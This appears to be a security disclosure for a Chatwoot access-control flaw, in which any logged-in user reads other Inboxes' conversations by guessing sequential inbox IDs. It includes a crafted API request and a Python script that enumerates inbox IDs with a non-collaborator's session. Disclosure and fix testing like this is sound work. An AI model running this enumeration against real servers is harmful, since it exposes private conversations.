Improper Privilege Management in chatwoot/chatwoot
Sep 6th 2021
A user without collaborator access to an Inbox is able to read the conversations in it by guessing the ID of the Inbox, which is a sequential integer.
🕵️♂️ Proof of Concept
1. With an Administrator user, create an Inbox (email type).
2. Add only the Administrator itself to the list of collaborators of the Inbox.
3. Create two further accounts, user A and user B. Neither of them is an Administrator, and neither is a collaborator of the Inbox.
4. With the Administrator, send a message to user A in the previously created Inbox.
5. Log in as user B and obtain the following values from the session cookie and the response headers: the whole cookie value, uid, access-token, client and expiry.
6. With the Administrator, open the Inbox and read its ID from the URL. This is an incremental value, so a malicious user can easily enumerate it.
7. Take the request below, replace the placeholders with the values from steps 5 and 6 (user B's cookie and token headers, the hostname, and the Inbox ID), and send it. If the server answers 304 Not Modified, drop the If-None-Match header and resend.

GET /api/v1/accounts/2/conversations?inbox_id=<INSERT_INBOX_ID_HERE>&status=open&assignee_type=all&page=1 HTTP/1.1
Host: <INSERT_HOSTNAME_HERE>:3000
Accept: application/json, text/plain, */*
expiry: 1636142330
token-type: Bearer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Referer: http://<INSERT_HOSTNAME_HERE>:3000/app/accounts/2/inbox/1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
If-None-Match: W/"8ed557c413e99925a3a4c825069d35f9"
Connection: close
Cookie: <INSERT_COOKIE_HERE>
uid: <INSERT_UID_HERE>
access-token: <INSERT_ACCESS_TOKEN_HERE>
client: <INSERT_CLIENT_HERE>
Content-Length: 2
Upon sending the crafted request, the full conversation list of the Inbox is returned to user B, who is not a collaborator of it.
Every Inbox in the account is therefore exposed to any authenticated user, whether or not that user is a collaborator of the Inbox; the only secret protecting an Inbox is its sequential ID, which is no secret at all.
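The enumeration described above, as an added example written for this page (it is neither chatwoot's code nor the reporter's): a small Python client that replays the PoC request for a range of inbox IDs with user B's session and flags the ones that return conversations. The endpoint path, query string and token headers are those of the request above; the hostname, the account number 2, the ID range and the `{"data": {"meta": ..., "payload": [...]}}` response shape are assumptions. `fake_vulnerable_send` is a constructed stand-in for a vulnerable server so the script runs offline; pass `http_send` (the default) to run it against an instance you are authorised to test. Against a correctly fixed build, `exposed_inboxes` must return an empty list for any non-collaborator.

```python
"""Added example for this write-up (not chatwoot's code): probe a range of
Chatwoot inbox IDs with a non-collaborator's session and report which ones
return conversations. Run it only against an instance you may test."""
import json
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable, List, Tuple

Sender = Callable[[str, Dict[str, str]], Tuple[int, str]]


def auth_headers(cookie: str, uid: str, access_token: str, client: str) -> Dict[str, str]:
    """Headers copied from user B's browser session (step 5 of the PoC)."""
    return {
        "Accept": "application/json, text/plain, */*",
        "token-type": "Bearer",
        "Cookie": cookie,
        "uid": uid,
        "access-token": access_token,
        "client": client,
    }


def conversations_url(base: str, account_id: int, inbox_id: int) -> str:
    """Same endpoint and query string as the request in the PoC."""
    return (f"{base}/api/v1/accounts/{account_id}/conversations"
            f"?inbox_id={inbox_id}&status=open&assignee_type=all&page=1")


def http_send(url: str, headers: Dict[str, str]) -> Tuple[int, str]:
    """Real sender: GET the URL and return (status, body).
    No If-None-Match is sent, so a 304 cannot mask a leak."""
    req = urllib.request.Request(url, headers=headers, method="GET")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def classify(status: int, body: str) -> str:
    """'leak' if the response carries conversations, 'empty' if 200 with none,
    'denied' for 401/403/404, otherwise the raw status. Assumes the
    {"data": {"meta": ..., "payload": [...]}} shape of the conversation index."""
    if status in (401, 403, 404):
        return "denied"
    if status != 200:
        return f"http_{status}"
    try:
        data = json.loads(body)
    except ValueError:
        return "unparseable"
    inner = data.get("data") if isinstance(data, dict) else None
    payload = inner.get("payload", []) if isinstance(inner, dict) else []
    return "leak" if payload else "empty"


def probe_inboxes(base: str, account_id: int, inbox_ids: Iterable[int],
                  headers: Dict[str, str], send: Sender = http_send) -> Dict[int, str]:
    """Walk the sequential inbox IDs with the non-collaborator's headers and classify each answer."""
    return {i: classify(*send(conversations_url(base, account_id, i), headers)) for i in inbox_ids}


def exposed_inboxes(results: Dict[int, str]) -> List[int]:
    """Inbox IDs the non-collaborator could read; after a correct fix this list is empty."""
    return sorted(i for i, verdict in results.items() if verdict == "leak")


def fake_vulnerable_send(url: str, headers: Dict[str, str]) -> Tuple[int, str]:
    """Constructed stand-in for a vulnerable server so the script runs offline:
    inbox 1 holds one conversation, inbox 2 exists but is empty, inbox 3 does not exist."""
    inbox_id = int(url.split("inbox_id=")[1].split("&")[0])
    if inbox_id == 1:
        return 200, json.dumps({"data": {"meta": {"all_count": 1}, "payload": [{"id": 7, "inbox_id": 1}]}})
    if inbox_id == 2:
        return 200, json.dumps({"data": {"meta": {"all_count": 0}, "payload": []}})
    return 404, json.dumps({"error": "Resource could not be found"})


if __name__ == "__main__":
    hdrs = auth_headers(cookie="<INSERT_COOKIE_HERE>", uid="<INSERT_UID_HERE>",
                        access_token="<INSERT_ACCESS_TOKEN_HERE>", client="<INSERT_CLIENT_HERE>")
    # replace fake_vulnerable_send with http_send to probe a live instance
    verdicts = probe_inboxes("http://127.0.0.1:3000", 2, range(1, 4), hdrs, send=fake_vulnerable_send)
    print(verdicts, "exposed:", exposed_inboxes(verdicts))
```

A `denied` verdict for an existing Inbox is what a fixed server should produce; a `leak` for any Inbox the probing user is not a member of reproduces the report. The ID walk stops being useful once a few consecutive IDs return 404, since Inbox IDs are allocated sequentially.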